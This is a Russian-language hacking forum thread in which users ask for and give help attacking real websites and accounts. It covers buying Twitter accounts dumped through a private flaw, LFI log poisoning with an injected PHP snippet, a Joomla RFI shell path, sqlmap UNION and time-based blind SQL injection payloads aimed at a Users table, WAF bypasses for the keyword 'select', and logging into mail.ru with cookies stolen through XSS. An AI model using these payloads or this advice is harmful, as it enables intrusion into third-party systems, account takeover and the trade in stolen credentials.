Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. websheff

    websheff New Member

    Joined:
    28 Oct 2012
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Подскажите в какую сторону копать по добыче акков твиттера. Все онлайн-магазы пишут что аккаунты с дампа. Не брут, не свежерег. Иньецкии в базы?
     
  2. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Просто есть приватная уязвимость на сайте твиттера, которая позволяет каждый день сливать от туда по 50-100к акков.
     
    _________________________
  3. websheff

    websheff New Member

    Joined:
    28 Oct 2012
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    получается все селлеры барижат одними и теми же акками? Или на каждого 50-100к акков?
     
  4. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,183
    Likes Received:
    618
    Reputations:
    690
    Кто сколько успеет собрать, всем хакерам которые имеют эту багу распределены время сбора, акки бывают и свежие и старореги!11
     
    _________________________
  5. websheff

    websheff New Member

    Joined:
    28 Oct 2012
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Да, это заметил что микс. А как по странам фильтруют то?

    Хм и где можно найти этих хакеров/приобрести долю/мониторить сосстояние бага?
     
  6. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    При доступу к БД сайта можно выводить аккаунты по странам и кол-во фолловеров. Стукни продавцам акков, они может продадут или посоветуют у кого купить.
     
    _________________________
  7. websheff

    websheff New Member

    Joined:
    28 Oct 2012
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Спасибо, попробую. Сомневаюсь что поделятся хлебушком, но рискнем
     
  8. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    Загадка небольшая
    Есть 3 сайта 1 человека.. на них стоят игровые сервера(ну сайты для регистрации, изменения пароля и т.п..клиентские игры..причем разные) есть файл login.aspx(но он не для входа.. вроде бы)

    В одном из них
    test10a|9cbea4ebc53dfb893f124932246b60ec|12341234
    В других 1|test10a|120971264|

    Может быть кто-то знает для чего это вообще нужно?(
     
  9. Dexec

    Dexec New Member

    Joined:
    10 Feb 2013
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    ребят помогите плз нашел LFI нашел error_log , обратился к сайту site.com/dir/file.css<?php phpinfo(); ?> делаю инклуд лога но в самом логе записывается вот так ss/icon.css%3C?php%20phpinfo();%20?%3E.

    как побороть эту кодировку ? ( чтоб <?php ?> нормально записывало ?
     
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    похоже на логины и пароли

    это твой фаерфокс урл кодирует, открой через другой браузер
     
  11. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    Ясенпень похоже.. но не могу понять для чего и куда.. Не для сайта точно :confused:
     
  12. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Тебе сюда
    http://vanga.ru/forum/
     
    _________________________
  13. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    в общем детский вопрос по рфи
    пример рфи в джумле
    как должен выглядеть путь к шелу?
    mosConfig_absolute_path так и должно быть или там нужно что то другое вписывать?
     
  14. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Если RFI и все зависимости удовлетворены, то удобнее всего http://site.ru/shell, а в конце ты прописываешь расширение, с которым идет запрос. Посмотреть его можно или в исходниках, или в логах.
     
  15. -=Cerberus=-

    -=Cerberus=- κρυπτός γράφω

    Joined:
    29 Apr 2012
    Messages:
    1,321
    Likes Received:
    930
    Reputations:
    391
    Народ подскажите в чем беда.
    использую SQLMAP, язва такого рода

    back-end DBMS: Microsoft SQL Server 2012

    Place: GET
    Parameter: sku
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: sku=-2896' UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(102)+CHAR(111)+CHAR(113)+CHAR(121)+CHAR(73)+CHAR(87)+C
    HAR(122)+CHAR(67)+CHAR(74)+CHAR(85)+CHAR(104)+CHAR(82)+CHAR(79)+CHAR(113)+CHAR(103)+CHAR(119)+CHAR(114)+CHAR(113)--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sku=USUSUSU'; WAITFOR DELAY '0:0:5'--

    имена баз данных достает нормально, таблицы с текущей тоже все ок, колонки с таблицы ок, а вот данные не хочет тянуть!

    так пытается достать инфу

    sku=USUSUSU'; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM dbname.dbo.Users),1,1))>1) WAITFOR DELAY '0:0:5'--

    в чём может быть косяк??? заранее благодарен за ответы!
     
    #22935 -=Cerberus=-, 13 Jan 2014
    Last edited: 13 Jan 2014
  16. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    фильтруется просто слово select на сайте. т.е даже если www.site.com/asfselect123 попробовать ввести, он покажет что сайт хотят взломать. Как попробовать обойти можно?
     
  17. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    SeLeCt
    SEselectECT
     
    _________________________
  18. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Попробуйте принудительно все символы в url-encode загнать, это может сработать, заивист от типа ids\waf. Как вариант, поиграться с регистром. Или же вообще отойти от union select.

    Также можно попробовать определить waf\ids и глянуть на его исходники\стандартные правила. Есть тулза WAFW00F для этого.
     
  19. -=Cerberus=-

    -=Cerberus=- κρυπτός γράφω

    Joined:
    29 Apr 2012
    Messages:
    1,321
    Likes Received:
    930
    Reputations:
    391
    или SQLMAP опция --check-waf
     
  20. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Вопрос касательно хсс на маилру
    украл я куки к примеру лежат они у меня на сниффере
    Беру отправлялку запросов отпраляю запрос на главную с этими куками и вижу что я типо авторизован с чужого ящика
    После обновления страницы ничего этого не будет так как в браузер эти куки не запишутся...
    Как я понял в маилру главная кука отвечающая за вход Mpop
    меняю mpop в опере и открываю маилру

    и что же вы думаете? зашел? - НЕТ
    просит ввести заново пароль при этом кука больше не работает!!
    Какже зайти на почту с чужих кук?
     
Thread Status:
Not open for further replies.